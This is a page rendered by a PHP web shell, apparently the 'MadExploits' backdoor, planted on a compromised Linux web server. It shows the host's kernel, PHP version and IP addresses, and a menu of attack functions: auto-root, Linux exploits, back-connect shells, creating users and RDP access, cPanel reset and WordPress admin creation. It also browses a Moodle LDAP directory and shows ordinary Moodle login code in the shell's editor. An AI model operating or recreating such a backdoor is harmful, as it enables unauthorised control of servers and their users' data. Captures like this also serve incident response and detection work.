Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.178.61
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead.aptans /
auth /
ldap /
[ HOME SHELL ]
Name
Size
Permission
Action
classes
[ DIR ]
drwxr-xr-x
cli
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
README-LDAP
74
B
-rw-r--r--
auth.php
93.27
KB
-rw-rw-r--
locallib.php
2.2
KB
-rw-r--r--
ntlmsso_attempt.php
1.24
KB
-rw-r--r--
ntlmsso_finish.php
1.12
KB
-rw-r--r--
ntlmsso_magic.php
1.22
KB
-rw-r--r--
settings.php
17.46
KB
-rw-r--r--
upgrade.txt
571
B
-rw-r--r--
version.php
1.14
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ntlmsso_attempt.php
<?php require(__DIR__.'/../../config.php'); $PAGE->set_url('/auth/ldap/ntlmsso_attempt.php'); $PAGE->set_context(context_system::instance()); // Define variables used in page $site = get_site(); $authsequence = get_enabled_auth_plugins(); // Auths, in sequence. if (!in_array('ldap', $authsequence, true)) { print_error('ldap_isdisabled', 'auth'); } $authplugin = get_auth_plugin('ldap'); if (empty($authplugin->config->ntlmsso_enabled)) { print_error('ntlmsso_isdisabled', 'auth_ldap'); } $sesskey = sesskey(); // Display the page header. This makes redirect respect the timeout we specify // here (and not add 3 more secs) which in turn prevents a bug in both IE 6.x // and FF 3.x (Windows version at least) where javascript timers fire up even // when we've already left the page that set the timer. $loginsite = get_string("loginsite"); $PAGE->navbar->add($loginsite); $PAGE->set_title("$site->fullname: $loginsite"); $PAGE->set_heading($site->fullname); echo $OUTPUT->header(); $msg = '<p>'.get_string('ntlmsso_attempting', 'auth_ldap').'</p>' . '<img width="1", height="1" ' . ' src="' . $CFG->wwwroot . '/auth/ldap/ntlmsso_magic.php?sesskey=' . $sesskey . '" />'; redirect($CFG->wwwroot . '/auth/ldap/ntlmsso_finish.php', $msg, 3);
Close